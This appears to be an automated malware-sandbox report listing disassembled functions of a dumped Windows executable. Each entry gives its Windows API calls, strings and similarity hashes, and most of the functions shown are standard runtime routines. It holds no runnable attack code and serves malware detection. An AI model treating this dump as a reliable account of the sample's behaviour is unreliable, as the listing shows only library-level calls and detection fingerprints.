Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
Instruction ID: 3960beb12fca16cbc5043acf4b8975ab8d8a6698fa07e30ad5f7fd63c5f4fb56
Opcode Fuzzy Hash: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
Instruction Fuzzy Hash: 14517B71900209EFCF228F95CC45AEF7FB5FF48794F10452AF918A1260C7398991DBAA

Function 0041750F Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041752A
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041753E
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041756A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175A2
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175C4
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175DD
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 004175F0
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041762E

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
Instruction ID: 0d29547afa55ef8e208fbe3ff43deda8167c9cf171b961166aceb77faed46397
Opcode Fuzzy Hash: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
Instruction Fuzzy Hash: 4A31ADB250D3157ED7207F799C848FBBABDEA49368B11053BF555C3200EA298DC286AD

Function 00418A6C Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,0041BDF8,00000001,?,74DEE860,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AAB
GetStringTypeA.KERNEL32(00000000,00000001,0041BDF4,00000001,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AC5
GetStringTypeA.KERNEL32(?,?,?,?,004186BE,74DEE860,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AF9
MultiByteToWideChar.KERNEL32(?,004256C5,?,?,00000000,00000000,74DEE860,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418B31
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,004186BE,?), ref: 00418B87
GetStringTypeW.KERNEL32(?,?,00000000,004186BE,?,?,?,?,?,?,004186BE,?), ref: 00418B99

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
Instruction ID: e288f18e772608454304c6360a88be647065f5ca3cb36798b5d5ed4d75a3f5a0
Opcode Fuzzy Hash: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
Instruction Fuzzy Hash: B0416DB2600219BFCF208F94DC86EEF7F79EB08794F10442AF915D2250D7389991CBA8

Function 004158B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 004158CF
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00415904
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00415964

Strings

__MSVCRT_HEAP_SELECT, xrefs: 004158FF
__GLOBAL_HEAP_SELECTED, xrefs: 0041593E

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
Instruction ID: 007b09a40ac423c1d447adb87a92c2e34be193f5817f586218815b66d4303cb2
Opcode Fuzzy Hash: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
Instruction Fuzzy Hash: 403177F1961648EDEF3196709C82BDF3B78DB46324F2400DBD185D6242E6388EC68B1B

Function 00417641 Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 0041769F
GetFileType.KERNEL32(?,?,00000000), ref: 0041774A
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004177AD
GetFileType.KERNEL32(00000000,?,00000000), ref: 004177BB
SetHandleCount.KERNEL32 ref: 004177F2

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
Instruction ID: 1521dec5194d53324a877df202082dadc936f581ec6971422c000dc394b087b4
Opcode Fuzzy Hash: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
Instruction Fuzzy Hash: 39510B716086458FC7208B28D8847A67BB0FB11378F65866ED5B2C72E0D738A886C759

Function 00403AA7 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

CharUpperW.USER32(00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AC2
GetLastError.KERNEL32(?,00000000,00000000,?,00403B6F), ref: 00403ACE
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AE9
CharUpperA.USER32(?,?,00000000,00000000,?,00403B6F), ref: 00403B02
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,00000000,00000000,?,00403B6F), ref: 00403B15

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: Char$ByteMultiUpperWide$ErrorLast
String ID:
API String ID: 3939315453-0
Opcode ID: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
Instruction ID: 0842cb939f6927aecb542cd9758d214692c03acffe84293a02396fd76ee0080f
Opcode Fuzzy Hash: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
Instruction Fuzzy Hash: B30144B65001197ADB20ABE49CC9DEBBA7CDB08259F414572F942A3281E3756E4487B8

Function 00415523 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,00416EEF,00417BBE,00000000,?,?,00000000,00000001), ref: 00415525
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00415533
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041557F

Part of subcall function 00416EFC: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00416FF2

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00415557
GetCurrentThreadId.KERNEL32 ref: 00415568

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
Instruction ID: cede6b9146d9eee740ee2dfbc4b23865fcca372efd47330e9e203dd76af2c63a
Opcode Fuzzy Hash: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
Instruction Fuzzy Hash: 09F09635A01611BBC7312B74AC096DB3E62EB857A1B51413AF551962A4DB28888196EC

Function 00417E3A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762

GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00414BA4), ref: 00417E8B

Part of subcall function 0041576B: LeaveCriticalSection.KERNEL32(?,00413F70,00000009,00413F5C,00000000,?,00000000,00000000,00000000), ref: 00415778

Strings

WB, xrefs: 00417EA8
WB, xrefs: 00417EF8
+B, xrefs: 00417E7F

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CriticalSection$EnterInfoInitializeLeave
String ID: +B$WB$WB
API String ID: 1866836854-4076192905
Opcode ID: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
Instruction ID: 91cfe2518806d3d9ee68befd2fe7c4d9c34af4d87c59522c175cbc6726151178
Opcode Fuzzy Hash: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
Instruction Fuzzy Hash: FC41243164C654AEE720DB24D8853EB7BF1AB05314FB4406BE5488B291CABD49C7C74C

Function 0041458F Relevance: 6.5, APIs: 5, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
Instruction ID: b0a20c71c01645f6642c62949d543ab21d76ee58160ce25a59b39075e73dd19d
Opcode Fuzzy Hash: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
Instruction Fuzzy Hash: 4691E671D01514ABCB21AB69DC85ADEBBB4EFC5764F240227F818B62D0D7398DC1CA6C

Function 0041659C Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,00420818,00420818,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165BD
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165E1
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165FB
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?), ref: 004166BC
HeapFree.KERNEL32(00000000,00000000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?,00000000), ref: 004166D3

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
Instruction ID: 0af9858cac0a30669fb94f5f64461d90f8de944a7195c69e4f59e8ed45fdce2d
Opcode Fuzzy Hash: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
Instruction Fuzzy Hash: 983101B0700705EBD3309F24EC45BA2BBE4EB44794F12823AE55597791E778E8818BCC

Function 00409787 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040978C

Part of subcall function 004095DD: EnterCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095E2
Part of subcall function 004095DD: LeaveCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095EC

EnterCriticalSection.KERNEL32(?), ref: 004097B9
LeaveCriticalSection.KERNEL32(?), ref: 004097D5
__aulldiv.LIBCMT ref: 00409824

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CriticalSection$EnterLeave$H_prolog__aulldiv
String ID:
API String ID: 3848147900-0
Opcode ID: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
Instruction ID: 0a470d0c852558693c62499fef9fcf54cb9603282822d0262474d13d459b1607
Opcode Fuzzy Hash: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
Instruction Fuzzy Hash: D2316076A00219AFCB10EFA1C881AEFBBB5FF48314F00442EE10573692CB79AD45CB64

Function 004095F7 Relevance: 6.0, APIs: 4, Instructions: 37windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00413260: SetEvent.KERNEL32(00000000,00407649), ref: 00413263

GetDlgItem.USER32(?,000003E8), ref: 0040961A
LoadIconA.USER32(00000000), ref: 00409634
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00409645
SetTimer.USER32(?,00000003,00000064,00000000), ref: 00409654

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: EventIconItemLoadMessageSendTimer
String ID:
API String ID: 2758541657-0
Opcode ID: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
Instruction ID: 551790b6ae67963d7c94afa5d69916b6b09ae611f895d6b9f891aac7cfc7161a
Opcode Fuzzy Hash: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
Instruction Fuzzy Hash: AF010830140B00AFD7219B21DD5AB66BBA1BF04721F008B2DE9A7959E0CB76B951CB48

Function 0040D7CC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040D7D1

Strings

, xrefs: 0040D988
, xrefs: 0040D9B0

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID: $
API String ID: 3519838083-227171996
Opcode ID: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
Instruction ID: b608afa5533618173c50a936dd0dc92eebd328cd23ff399218f1dfb4b0bc6294
Opcode Fuzzy Hash: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
Instruction Fuzzy Hash: 6A713571E0020A9FCB24DF99D481AAEB7B1FF48314F10457ED416B7691D734AA8ACF54

Function 00403D5A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403D5F

Part of subcall function 00403F3C: __EH_prolog.LIBCMT ref: 00403F41

Strings

KA, xrefs: 00403DA1, 00403DD1, 00403DA4
> @, xrefs: 00403D6A

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID: > @$KA
API String ID: 3519838083-301980584
Opcode ID: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
Instruction ID: 0797aa4f2666763f951e0621ef07ec53320c6840b80f95fc9e8c0876c74f2843
Opcode Fuzzy Hash: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
Instruction Fuzzy Hash: 27517D30D0020A9ACF15EF95C855AEEBF7AAF5430AF10452FE452372D2DB795B06CB89

Function 0041808D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 004180A1

Strings

, xrefs: 004180C6
, xrefs: 004180EA

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
Instruction ID: d0f9309d8466ab513fef0fe96190925d4c3a9a36aebfd3e00fd14af349a29a6b
Opcode Fuzzy Hash: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
Instruction Fuzzy Hash: 18417C322046586EEB22DB14CC4DFFB7FA8DB06700F9400EAD549C7162CA794985CBAA

Function 00405F5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00405F63
LoadStringW.USER32(KA,?,?,00000000), ref: 00405FBC

Strings

KA, xrefs: 00405FB9

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prologLoadString
String ID: KA
API String ID: 385046869-4133974868
Opcode ID: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
Instruction ID: f8b33de4bb70f64bdff40eb498b0250b344fd9cf2a6d880d3b442eae3703c9f6
Opcode Fuzzy Hash: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
